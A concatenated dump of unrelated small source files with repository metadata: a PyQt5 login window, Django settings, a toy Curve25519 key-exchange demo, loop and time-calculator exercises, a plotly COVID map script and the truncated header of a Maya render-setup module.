# fram = cv2.imread('/home/YJS/111/1.jpg')
# frame=frameprocessing(fram) ###############
# cv2.imwrite('/home/YJS/111/3.jpg',frame)
| [
"[email protected]"
] | |
fe5afc9879b959e3ea8af568f5faa66bfaa6b37f | 2bfefffbc80dde1ff6996a4c6da28a35a93bcfc1 | /ML_App/prediction.py | 7ff59a89bcbff012827803f43760b7801439b8bc | [] | no_license | Gozdescientist/Machine_Learning_app | 16679b22be56e2c44a54d74b5f1c9aa41584a7dd | 99716f145cb9cac89932d156720791bb89de4d58 | refs/heads/main | 2022-12-20T13:40:00.769806 | 2020-10-05T07:56:34 | 2020-10-05T07:56:34 | 300,936,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,448 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'prediction.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1066, 694)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/icons/icons/bars.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setStyleSheet("#centralwidget{\n"
"border-image: url(:/icons/icons/main.png);\n"
"}")
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setFamily("Segoe Print")
font.setPointSize(25)
font.setBold(True)
font.setWeight(75)
self.label_3.setFont(font)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName("label_3")
self.verticalLayout_4.addWidget(self.label_3)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
spacerItem1 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.horizontalLayout_2.addItem(spacerItem1)
self.formFrame = QtWidgets.QFrame(self.centralwidget)
self.formFrame.setMinimumSize(QtCore.QSize(400, 220))
self.formFrame.setMaximumSize(QtCore.QSize(16777215, 100))
self.formFrame.setStyleSheet("#formFrame{\n"
"background-color: rgb(255, 255, 255);\n"
"border-radius: 10px\n"
"}")
self.formFrame.setObjectName("formFrame")
self.formLayout = QtWidgets.QFormLayout(self.formFrame)
self.formLayout.setObjectName("formLayout")
self.label = QtWidgets.QLabel(self.formFrame)
self.label.setMaximumSize(QtCore.QSize(16777215, 300))
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(15)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label.setObjectName("label")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.label)
self.lineEdit_username = QtWidgets.QLineEdit(self.formFrame)
self.lineEdit_username.setMinimumSize(QtCore.QSize(0, 30))
self.lineEdit_username.setObjectName("lineEdit_username")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.lineEdit_username)
self.label_2 = QtWidgets.QLabel(self.formFrame)
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(15)
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_2.setObjectName("label_2")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.label_2)
self.lineEdit_password = QtWidgets.QLineEdit(self.formFrame)
self.lineEdit_password.setMinimumSize(QtCore.QSize(0, 30))
self.lineEdit_password.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEdit_password.setObjectName("lineEdit_password")
self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.lineEdit_password)
self.label_4 = QtWidgets.QLabel(self.formFrame)
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.formLayout.setWidget(7, QtWidgets.QFormLayout.FieldRole, self.label_4)
self.PushButton_signup = QtWidgets.QPushButton(self.formFrame)
self.PushButton_signup.setMinimumSize(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.PushButton_signup.setFont(font)
self.PushButton_signup.setStyleSheet("color: rgb(0, 0, 0);\n"
"border-right-color: rgb(0, 0, 0);\n"
"border-color: rgb(85, 0, 255);\n"
"background-color: rgb(174, 229, 183);\n"
"border-radius: 10px\n"
"")
self.PushButton_signup.setObjectName("PushButton_signup")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.FieldRole, self.PushButton_signup)
self.horizontalLayout_2.addWidget(self.formFrame)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem2)
self.verticalLayout_4.addLayout(self.horizontalLayout_2)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem3)
spacerItem4 = QtWidgets.QSpacerItem(20, 120, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.horizontalLayout.addItem(spacerItem4)
self.PushButton_login = QtWidgets.QPushButton(self.centralwidget)
self.PushButton_login.setMinimumSize(QtCore.QSize(150, 70))
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.PushButton_login.setFont(font)
self.PushButton_login.setStyleSheet("color: rgb(0, 0, 0);\n"
"border-right-color: rgb(0, 0, 0);\n"
"border-color: rgb(85, 0, 255);\n"
"background-color: rgb(75, 150, 225);\n"
"border-radius: 10px\n"
"")
self.PushButton_login.setObjectName("PushButton_login")
self.horizontalLayout.addWidget(self.PushButton_login)
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem5)
self.verticalLayout_4.addLayout(self.horizontalLayout)
self.label_5 = QtWidgets.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setFamily("Century Gothic")
font.setPointSize(8)
font.setBold(True)
font.setItalic(True)
font.setWeight(75)
self.label_5.setFont(font)
self.label_5.setStyleSheet("")
self.label_5.setObjectName("label_5")
self.verticalLayout_4.addWidget(self.label_5)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1066, 26))
self.menubar.setObjectName("menubar")
self.menuApplication = QtWidgets.QMenu(self.menubar)
self.menuApplication.setObjectName("menuApplication")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionExit = QtWidgets.QAction(MainWindow)
self.actionExit.setObjectName("actionExit")
self.menuApplication.addAction(self.actionExit)
self.menubar.addAction(self.menuApplication.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Welcome!!"))
self.label_3.setText(_translate("MainWindow", "Machine Learning Predictions"))
self.label.setText(_translate("MainWindow", "Username"))
self.label_2.setText(_translate("MainWindow", "Password"))
self.label_4.setText(_translate("MainWindow", "Don\'t have an account?"))
self.PushButton_signup.setText(_translate("MainWindow", "SignUp"))
self.PushButton_login.setText(_translate("MainWindow", "Login"))
self.label_5.setText(_translate("MainWindow", "This application aims to analyze the business processes of different departments of the Group Company and obtain various predictions. All rights reserved."))
self.menuApplication.setTitle(_translate("MainWindow", "Application"))
self.actionExit.setText(_translate("MainWindow", "Exit"))
import icons_rc
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
b8b5d53aedd215e4c38db5455b764f4b73bb83b5 | 3420aba3622faf2d4aede984c656f68ad24a1f3c | /backend/personal_care_22730/settings.py | 230da7088fe365290e5935afd842c015a2ea9d7d | [] | no_license | crowdbotics-apps/personal-care-22730 | bb81af122e64cb58f6d52df31df328b6dfa4b25d | 066d2cd5e890057df054ea7c5b3b5f061e872371 | refs/heads/master | 2023-01-11T06:30:05.971088 | 2020-11-18T16:23:30 | 2020-11-18T16:23:30 | 313,990,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,048 | py | """
Django settings for personal_care_22730 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.sites",
"healthcare",
]
LOCAL_APPS = [
"home",
"users.apps.UsersConfig",
]
THIRD_PARTY_APPS = [
"rest_framework",
"rest_framework.authtoken",
"rest_auth",
"rest_auth.registration",
"bootstrap4",
"allauth",
"allauth.account",
"allauth.socialaccount",
"allauth.socialaccount.providers.google",
"django_extensions",
"drf_yasg",
"storages",
# start fcm_django push notifications
"fcm_django",
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "personal_care_22730.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "personal_care_22730.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {"default": env.db()}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = "/static/"
MIDDLEWARE += ["whitenoise.middleware.WhiteNoiseMiddleware"]
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = "email"
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID
and AWS_SECRET_ACCESS_KEY
and AWS_STORAGE_BUCKET_NAME
and AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = "/mediafiles/"
MEDIA_ROOT = os.path.join(BASE_DIR, "mediafiles")
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning(
"You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails."
)
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"[email protected]"
] | |
2b05106d3a46f169272d1e3f9813b03703458746 | 842c0fd117d1bf0502988ae960c174a598d72584 | /ecdh.py | 610756bf66b689a00a18c59c923b5f542fd32cb5 | [] | no_license | ThomasB123/ecc | e41ab8314ef38ff11583cdf816b2c059e9e455cf | 45d8585263bf29f922ee94d3d588e71ecf41fbeb | refs/heads/main | 2023-06-14T22:07:36.010246 | 2021-07-13T16:44:31 | 2021-07-13T16:44:31 | 304,315,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,678 | py |
def binary(num): # convert denary number to binary
out = []
while num > 0:
if num % 2 == 1:
num -= 1
out.append(1)
else:
out.append(0)
num /= 2
return out
def move(xa,ya,xb,yb):
if [xa,ya] == [xb,yb]:
# doubling a point
m = ((3*xa**2+a)*pow(2*ya,p-2,p)) % p # (3x^2+a)/(2y) % p
else:
# adding two points
m = ((yb-ya)*pow(xb-xa,p-2,p)) % p # (yb-ya)/(xb-xa) % p
xd = (m**2 -xa-xb) % p
yd = (m*(xa-xd) - ya) % p
return xd,yd
def K(start,k):
points = [start]
bina = binary(k)
for i in range(len(bina)-bina.index(1)):
points.append(move(points[-1][0],points[-1][1],points[-1][0],points[-1][1])) # double
index = bina.index(1) # find first occurence of 1 in the binary representation
out = points[index] # start with smallest multiple of g
for i in range(index+1,len(bina)): # count up from the smallest multiple
if bina[i] == 1:
out = move(out[0],out[1],points[i][0],points[i][1])
return out
def montgomery(a,b): # convert from montgomery to short weierstrass
# a = (3 - a^2)/(3b^2) and b = (2a^3 - 9a)/(27b^3)
return (3-a**2)*pow(3*b**2,p-2,p),(2*a**3-9*a)*pow(27*b**3,p-2,p)
def edwards(d): # convert from edwards to short weierstrass
# a = 2(1 + d)/(1 - d) and b = 4/(1 - d)
return montgomery(2*(1+d)*pow(1-d,p-2,p),4*pow(1-d,p-2,p))
# public parameters: p,a,b,g
# Curve25519
print('You are using Curve25519')
p = 2**255 - 19
a,b = montgomery(486662,1)
g = (9,14781619447589544791020593568409986887264606134616475288964881837755586237401)
print('Equation of curve: y^2 = x^3 + 486662x^2 + x mod 2^255 - 19')
print('Starting point g = {}'.format(g))
print()
# Change private keys here
#####################################
# private keys 2 <= ka,kb <= p-2
ka = 2**200-1 # Alice private key
kb = 2**210-1 # Bob private key
#####################################
print('Alice computes A = (ka)g mod p')
A = K(g,ka) # Alice calculation
print('A = {}\n'.format(A))
print('Alice sends A to Bob\n')
print('Bob computes B = (kb)g mod p')
B = K(g,kb) # Bob calculation
print('B = {}\n'.format(B))
print('Bob sends B to Alice\n')
# Bob sends B to Alice
print('Alice computes K = (ka)B mod p = (ka.kb)g mod p')
k = K(B,ka) # Alice calculation
print('K = {}\n'.format(k))
# Alice sends A to Bob
print('Bob computes K = (kb)A mod p = (kb.ka)g mod p')
k = K(A,kb) # Bob calculation
print('K = {}\n'.format(k))
# Alice and Bob now know the same K
print('Alice and Bob now know the same K\n')
print('x-coordinate used as secret value')
print('Secret value = {}\n'.format(k[0]))
| [
"[email protected]"
] | |
b4215825da1da85f06424f250276cdaa31fbf895 | 91bcf9bdbe35a9ea450f2a9792ec092dd9146d83 | /loop45.py | 3186c1fb626842967571458dc24712d9880ffbe8 | [] | no_license | degavathmamatha/LOOP_PY | c2c495966dc82750c6ff33276dedd308d97e8ba2 | 354a613513c784860aa6ec5a27e7a3901a91c2fb | refs/heads/main | 2023-05-17T15:19:53.807678 | 2021-06-02T17:06:06 | 2021-06-02T17:06:06 | 373,244,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | i=69
while i>=65:
j=65
while j<=i:
print(chr(i),end=" ")
j=j+1
i=i-1
print() | [
"[email protected]"
] | |
8bff23b2e9efc484a7dafa78905b9ed3efde7cac | 04d9640857ee86879bdf10147863c484ac520f06 | /main.py | d909d80047c65aac58b19f9486a3f6bc47986c5b | [
"CC0-1.0"
] | permissive | fretless1/beard-respite | f3b05c9c558f751160ebfd3ede7d13da919d656b | be18f4231fee31606d4f71e0a12cf6ef04c7e870 | refs/heads/main | 2023-05-10T01:36:33.274741 | 2021-05-31T17:21:01 | 2021-05-31T17:21:01 | 372,528,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,664 | py | import math
print("Mit diesem Rechner kannst du eine beliebige Bedenkzeit vor der Rasur deines Bartes berechnen.")
# Gesamtzeit = Wachstumszeit + Bedenkzeit = Wachstumszeit + (Wachstumszeit/Vorlaufzeit)
print()
# Anzahl der Tage für die Wachstumszeit
g = float(input("Gib hier die Anzahl der Tage ein, die vergangen sind seit du dich das letzte Mal rasiert hast: "))
# Vorlaufzeit bzw. Modul für die Bedenkzeit
v = float(input("Gib hier die Anzahl der Tage für die Vorlaufzeit ein, die für einen Tag Bedenkzeit nötig ist: "))
# "addtime" berechnet die Bedenkzeit c in Abhängigkeit von der Vorlaufzeit b
def addtime(a, b):
c = a / b
return c
# unterscheidet beim Output zwischen "Jahr" und "Jahre"
if math.floor(g / 360) == 1:
y = " Jahr"
else:
y = " Jahre"
# unterscheidet beim Output zwischen "Monat" und "Monate"
if math.floor(g % 360) == 30:
m = " Monat"
else:
m = " Monate"
# unterscheidet beim Output zwischen "Tag" und "Tage"
if v == 1 or math.floor(g % 30) == 1:
d = " Tag"
else:
d = " Tage"
# unterscheidet beim Output zwischen "Stunde" und "Stunden"
if math.floor((g * 24) % 24) == 1:
h = " Stunde"
else:
h = " Stunden"
# unterscheidet beim Output zwischen "Minute" und "Minuten"
if math.floor((((g * 24) % 24) * 60) % 60) == 1:
mi = " Minute"
else:
mi = " Minuten"
# unterscheidet beim Output zwischen "Sekunde" und "Sekunden"
if math.floor((((((g * 24) % 24) * 60) % 60) * 60) % 60) == 1:
s = " Sekunde"
else:
s = " Sekunden"
print()
print("Wachstumszeit: ")
print(math.floor(g/360), y)
print(math.floor((g % 360)/30), m)
print(math.floor((g % 360) % 30), d)
print(math.floor(((g % 360) % 30) * 24) % 24, h)
print(math.floor((((((g % 360) % 30) * 24) % 24) * 60) % 60), mi)
print(math.floor((((((((g % 360) % 30) * 24) % 24) * 60) % 60) * 60) % 60), s)
# unterscheidet beim Output zwischen "Jahr" und "Jahre"
if math.floor(addtime(g, v) / 360) == 1:
y = " Jahr"
else:
y = " Jahre"
# unterscheidet beim Output zwischen "Monat" und "Monate"
if math.floor(addtime(g, v) % 360) == 30:
m = " Monat"
else:
m = " Monate"
# unterscheidet beim Output zwischen "Tag" und "Tage"
if v == 1 or math.floor(addtime(g, v) % 30) == 1:
d = " Tag"
else:
d = " Tage"
# unterscheidet beim Output zwischen "Stunde" und "Stunden"
if math.floor((addtime(g, v) * 24) % 24) == 1:
h = " Stunde"
else:
h = " Stunden"
# unterscheidet beim Output zwischen "Minute" und "Minuten"
if math.floor((((addtime(g, v) * 24) % 24) * 60) % 60) == 1:
mi = " Minute"
else:
mi = " Minuten"
# unterscheidet beim Output zwischen "Sekunde" und "Sekunden"
if math.floor((((((addtime(g, v) * 24) % 24) * 60) % 60) * 60) % 60) == 1:
s = " Sekunde"
else:
s = " Sekunden"
print()
print("Bedenkzeit: ")
print(math.floor(addtime(g, v)/360), y)
print(math.floor((addtime(g, v) % 360)/30), m)
print(math.floor((addtime(g, v) % 360) % 30), d)
print(math.floor(((addtime(g, v) % 360) % 30) * 24) % 24, h)
print(math.floor((((((addtime(g, v) % 360) % 30) * 24) % 24) * 60) % 60), mi)
print(math.floor((((((((addtime(g, v) % 360) % 30) * 24) % 24) * 60) % 60) * 60) % 60), s)
# unterscheidet beim Output zwischen "Jahr" und "Jahre"
if math.floor(addtime(g, v) / 360) == 1:
y = " Jahr"
else:
y = " Jahre"
# unterscheidet beim Output zwischen "Monat" und "Monate"
if math.floor((addtime(g, v) + g) % 360) == 30:
m = " Monat"
else:
m = " Monate"
# unterscheidet beim Output zwischen "Tag" und "Tage"
if v == 1 or math.floor((addtime(g, v) + g) % 30) == 1:
d = " Tag"
else:
d = " Tage"
# unterscheidet beim Output zwischen "Stunde" und "Stunden"
if math.floor(((addtime(g, v) + g) * 24) % 24) == 1:
h = " Stunde"
else:
h = " Stunden"
# unterscheidet beim Output zwischen "Minute" und "Minuten"
if math.floor(((((addtime(g, v) + g) * 24) % 24) * 60) % 60) == 1:
mi = " Minute"
else:
mi = " Minuten"
# unterscheidet beim Output zwischen "Sekunde" und "Sekunden"
if math.floor(((((((addtime(g, v) + g) * 24) % 24) * 60) % 60) * 60) % 60) == 1:
s = " Sekunde"
else:
s = " Sekunden"
print()
print("Gesamtzeit: ")
print(math.floor((g + addtime(g, v))/360), y)
print(math.floor(((g + addtime(g, v)) % 360)/30), m)
print(math.floor(((g + addtime(g, v)) % 360) % 30), d)
print(math.floor((((g + addtime(g, v)) % 360) % 30) * 24) % 24, h)
print(math.floor(((((((g + addtime(g, v)) % 360) % 30) * 24) % 24) * 60) % 60), mi)
print(math.floor(((((((((g + addtime(g, v)) % 360) % 30) * 24) % 24) * 60) % 60) * 60) % 60), s)
| [
"[email protected]"
] | |
5636c3dd3742788051538088505928e3ef3fe2fb | 2fa6156bcb1935b0a4897d1e6229cd0f73714130 | /gs_runplots.py | 3b59643b8e739ca1d34634703efd923eeb25c836 | [
"MIT"
] | permissive | briangalindoherbert/gs_mapdemo | 9fdaed1196452d438af3573ecb74632bb9930460 | 86f1791e8a8913335a24ea32ae10d16a86dfa415 | refs/heads/main | 2023-02-04T15:53:41.548014 | 2020-12-15T21:14:04 | 2020-12-15T21:14:04 | 314,715,162 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | # encoding=utf-8
"""
this is a script to separate the running of plots on processed data from the import, wrangling, and calc work done in
gs_mapdemo.py. I do a lot of customization on the plotting end that uses the same DataFrames, I don't need to do
that processing to test out minor plotting changes.
"""
import pandas as pd
from plotly.io import renderers
from gs_dochoro import *
runcounty = True
runnyt = False
runstate = True
renderers.default = 'browser'
pd.options.plotting.backend = 'plotly'
pd.set_option('precision',7)
pd.set_option('display.float_format','{:.2f}'.format)
plotly_token = 'pk.eyJ1IjoiYmdoZXJiZXJ0IiwiYSI6ImNrYXl2MmFhYjBncHEyc3Bpa2ozczQwdGgifQ.glPFF4kjwrhP40bncFSnZA'
if runcounty:
# go_cty = do_countyplot(df, updated)
go_cty = do_casesplot(df, date_jhu)
go_ctymort = do_countyplot(df, date_jhu)
go_cty.show()
go_ctymort.show()
if runnyt:
df_nyt1 = do_countystats(df_nyt)
go_nyt = do_nytcounty(df_nyt1, date_nyt)
go_nyt.show()
if runstate:
go_obj = do_stateplot(df_st, date_jhus)
go_obj.show()
| [
"[email protected]"
] | |
52bc7632cb2fb0f992aefdbbb894875a1607ea42 | 508321d683975b2339e5292202f3b7a51bfbe22d | /Userset.vim/ftplugin/python/CompletePack/maya/app/renderSetup/model/collection.py | 6f5c78e3c5ec754621968564b253a3121787e876 | [] | no_license | cundesi/vimSetSa | 4947d97bcfe89e27fd2727423112bb37aac402e2 | 0d3f9e5724b471ab21aa1199cc3b4676e30f8aab | refs/heads/master | 2020-03-28T05:54:44.721896 | 2018-08-31T07:23:41 | 2018-08-31T07:23:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54,254 | py | """Collection node class and utility functions.
This module provides the collection class, as well as utility
functions to operate on collections.
The collection owns its associated selector node: on collection
delete, the collection is deleted as well.
Conceptually, a collection fulfills four roles in render setup:
1) It is a container of overrides. If enabled, the collection will
apply all its enabled overrides on nodes it selects (see (2)).
2) It selects nodes onto which overrides will be applied. These nodes
can be DAG or DG nodes.
3) It is a container of child collections. Child collections always
select nodes based on their parent's selected nodes (see (2)).
4) It defines render layer membership. Members of a render layer can
only be DAG nodes. These are always a subset of the nodes selected
by the collection (see (2)). The members of the render layer are the
union of the top-level collection members; children collections can
exclude or re-include members. See RenderLayer.getMembers for more
details (including the effect of isolate select mode).
The application of overrides only obeys enabled / disabled status.
Render layer membership is determined from enabled / disabled, in
conjunction with isolate select."""
import maya
maya.utils.loadStringResourcesForModule(__name__)
import re
import maya.cmds as cmds
import maya.api.OpenMaya as OpenMaya
import maya.app.renderSetup.model.nodeList as nodeList
import maya.app.renderSetup.model.utils as utils
import maya.app.renderSetup.model.plug as plug
import maya.app.renderSetup.model.typeIDs as typeIDs
import maya.app.renderSetup.model.selector as selector
import maya.app.renderSetup.model.undo as undo
import maya.app.renderSetup.model.override as override
import maya.app.renderSetup.model.overrideUtils as overrideUtils
import maya.app.renderSetup.model.childNode as childNode
import maya.app.renderSetup.model.enabled as computeEnabled
import maya.app.renderSetup.model.namespace as namespace
import maya.app.renderSetup.model.renderSettings as renderSettings
import maya.app.renderSetup.model.rendererCallbacks as rendererCallbacks
import maya.app.renderSetup.model.traverse as traverse
from maya.app.renderSetup.model.renderLayerSwitchObservable import RenderLayerSwitchObservable
import maya.app.renderSetup.model.clipboardData as clipboardData
import maya.app.renderSetup.common.utils as commonUtils
import maya.app.renderSetup.common.profiler as profiler
import maya.app.renderSetup.common.guard as guard
import maya.app.renderSetup.model.context as context
import maya.app.renderSetup.model.jsonTranslatorUtils as jsonTranslatorUtils
import maya.app.renderSetup.model.jsonTranslatorGlobals as jsonTranslatorGlobals
# List all error messages below
